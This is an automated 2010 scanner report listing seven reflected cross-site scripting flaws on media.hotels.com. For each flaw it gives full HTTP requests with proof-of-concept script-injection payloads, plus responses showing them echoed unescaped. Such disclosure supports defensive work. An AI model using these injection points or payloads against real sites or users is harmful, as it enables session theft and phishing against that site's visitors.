Report generated by XSS.CX at Sun Nov 14 09:52:25 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=LANDING&PLACEMENT=CCOL1&SECTION=CITY&DEST=NYC&LANGID=1033 [name of an arbitrarily supplied request parameter]

1.2. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=7baf8c77-be9c-4bda-900e-656cb1ee8967 [name of an arbitrarily supplied request parameter]

1.3. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=c22d1778-9c55-4d52-b803-b0373af27c22 [name of an arbitrarily supplied request parameter]

1.4. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=0e9e3e95-026b-4dd1-b5ee-f86eb50cd9e5 [name of an arbitrarily supplied request parameter]

1.5. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=95b3a068-fc68-481a-93e3-a9ab12197cfd [name of an arbitrarily supplied request parameter]

1.6. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=97e09a0f-78ff-4428-94dc-f80a4f7502fe [name of an arbitrarily supplied request parameter]

1.7. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=bcb0cddf-0eb5-4820-a280-92f206a74a01 [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=LANDING&PLACEMENT=CCOL1&SECTION=CITY&DEST=NYC&LANGID=1033 [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=LANDING&PLACEMENT=CCOL1&SECTION=CITY&DEST=NYC&LANGID=1033

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd143--><script>alert(1)</script>9e4eb687f59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=LANDING&PLACEMENT=CCOL1&SECTION=CITY&DEST=NYC&LANGID=1033?bd143--><script>alert(1)</script>9e4eb687f59=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: media.hotels.com
Cookie: SSID=iRepPE0cowIT05uEcd0F; SSSC=7.95202719.111492730.0.0; SSLB=1; SESSID=C460CE72AF4D258D2027DCFF7613439D.hm04tc01; guid=0a3a7935-6af8-46f1-acba-98a0203fa542; hcomPSRC=OT2; channel=DC; user=QSplbl9VU3xIQ09NX1VT; mvthistory=""; jsEnabled=false

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 15:08:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.1.3188.33477 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=LANDING&PLACEMENT=CCOL1&SECTION=CITY&DEST=NYC&LANGID=1033?bd143--><script>alert(1)</script>9e4eb687f59=1&tile=862c33b1-a2d8-491c-b059-129fb18363ec -->
...[SNIP]...

1.2. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=7baf8c77-be9c-4bda-900e-656cb1ee8967 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=7baf8c77-be9c-4bda-900e-656cb1ee8967

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d32cc--><script>alert(1)</script>f18fe7933b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=7baf8c77-be9c-4bda-900e-656cb1ee8967?d32cc--><script>alert(1)</script>f18fe7933b0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: media.hotels.com
Cookie: SSID=iRepPE0cowIT05uEcd0F; SSSC=7.95202719.111492730.0.0; SSLB=1; SESSID=C460CE72AF4D258D2027DCFF7613439D.hm04tc01; guid=0a3a7935-6af8-46f1-acba-98a0203fa542; hcomPSRC=OT2; channel=DC; user=QSplbl9VU3xIQ09NX1VT; mvthistory=""; jsEnabled=false

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 15:08:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.1.3188.33477 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&tile=7baf8c77-be9c-4bda-900e-656cb1ee8967?d32cc--><script>alert(1)</script>f18fe7933b0=1 --><di
...[SNIP]...

1.3. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=c22d1778-9c55-4d52-b803-b0373af27c22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=c22d1778-9c55-4d52-b803-b0373af27c22

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 67416--><script>alert(1)</script>8be8eb5a7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&TILE=c22d1778-9c55-4d52-b803-b0373af27c22?67416--><script>alert(1)</script>8be8eb5a7c0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: media.hotels.com
Cookie: SSID=iRepPE0cowIT05uEcd0F; SSSC=7.95202719.111492730.0.0; SSLB=1; SESSID=C460CE72AF4D258D2027DCFF7613439D.hm04tc01; guid=0a3a7935-6af8-46f1-acba-98a0203fa542; hcomPSRC=OT2; channel=DC; user=QSplbl9VU3xIQ09NX1VT; mvthistory=""; jsEnabled=false

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 15:08:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.1.3188.33477 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&LANGID=1033&tile=c22d1778-9c55-4d52-b803-b0373af27c22?67416--><script>alert(1)</script>8be8eb5a7c0=1 --><di
...[SNIP]...

1.4. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=0e9e3e95-026b-4dd1-b5ee-f86eb50cd9e5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=0e9e3e95-026b-4dd1-b5ee-f86eb50cd9e5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 54c45<x%20style%3dx%3aexpression(alert(1))>f4840453277 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54c45<x style=x:expression(alert(1))>f4840453277 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=0e9e3e95-026b-4dd1-b5ee-f86eb50cd9e5?54c45<x%20style%3dx%3aexpression(alert(1))>f4840453277=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: media.hotels.com
Cookie: SSID=iRepPE0cowIT05uEcd0F; SSSC=7.95202719.111492730.0.0; SSLB=1; SESSID=C460CE72AF4D258D2027DCFF7613439D.hm04tc01; guid=0a3a7935-6af8-46f1-acba-98a0203fa542; hcomPSRC=OT2; channel=DC; user=QSplbl9VU3xIQ09NX1VT; mvthistory=""; jsEnabled=false

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 15:08:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.1.3188.33477 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&tile=0e9e3e95-026b-4dd1-b5ee-f86eb50cd9e5?54c45<x style=x:expression(alert(1))>f4840453277=1 -->
...[SNIP]...

1.5. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=95b3a068-fc68-481a-93e3-a9ab12197cfd [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=95b3a068-fc68-481a-93e3-a9ab12197cfd

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 53723<x%20style%3dx%3aexpression(alert(1))>c8c6b71d4df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53723<x style=x:expression(alert(1))>c8c6b71d4df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&TILE=95b3a068-fc68-481a-93e3-a9ab12197cfd?53723<x%20style%3dx%3aexpression(alert(1))>c8c6b71d4df=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: media.hotels.com
Cookie: SSID=iRepPE0cowIT05uEcd0F; SSSC=7.95202719.111492730.0.0; SSLB=1; SESSID=C460CE72AF4D258D2027DCFF7613439D.hm04tc01; guid=0a3a7935-6af8-46f1-acba-98a0203fa542; hcomPSRC=OT2; channel=DC; user=QSplbl9VU3xIQ09NX1VT; mvthistory=""; jsEnabled=false

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 15:08:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.1.3188.33477 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&LANGID=1033&tile=95b3a068-fc68-481a-93e3-a9ab12197cfd?53723<x style=x:expression(alert(1))>c8c6b71d4df=1 -->
...[SNIP]...

1.6. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=97e09a0f-78ff-4428-94dc-f80a4f7502fe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=97e09a0f-78ff-4428-94dc-f80a4f7502fe

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c41f--><script>alert(1)</script>755dfbdddd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=97e09a0f-78ff-4428-94dc-f80a4f7502fe?9c41f--><script>alert(1)</script>755dfbdddd2=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: media.hotels.com
Cookie: SSID=iRepPE0cowIT05uEcd0F; SSSC=7.95202719.111492730.0.0; SSLB=1; SESSID=C460CE72AF4D258D2027DCFF7613439D.hm04tc01; guid=0a3a7935-6af8-46f1-acba-98a0203fa542; hcomPSRC=OT2; channel=DC; user=QSplbl9VU3xIQ09NX1VT; mvthistory=""; jsEnabled=false

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 15:08:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.1.3188.33477 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&tile=97e09a0f-78ff-4428-94dc-f80a4f7502fe?9c41f--><script>alert(1)</script>755dfbdddd2=1 --><!-
...[SNIP]...

1.7. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=bcb0cddf-0eb5-4820-a280-92f206a74a01 [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=bcb0cddf-0eb5-4820-a280-92f206a74a01

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8fb2e--><script>alert(1)</script>d32addccd2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&TILE=bcb0cddf-0eb5-4820-a280-92f206a74a01?8fb2e--><script>alert(1)</script>d32addccd2e=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: media.hotels.com
Cookie: SSID=iRepPE0cowIT05uEcd0F; SSSC=7.95202719.111492730.0.0; SSLB=1; SESSID=C460CE72AF4D258D2027DCFF7613439D.hm04tc01; guid=0a3a7935-6af8-46f1-acba-98a0203fa542; hcomPSRC=OT2; channel=DC; user=QSplbl9VU3xIQ09NX1VT; mvthistory=""; jsEnabled=false

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 15:08:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.1.3188.33477 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&LANGID=1033&tile=bcb0cddf-0eb5-4820-a280-92f206a74a01?8fb2e--><script>alert(1)</script>d32addccd2e=1 --><!-
...[SNIP]...

Report generated by XSS.CX at Sun Nov 14 09:52:25 CST 2010.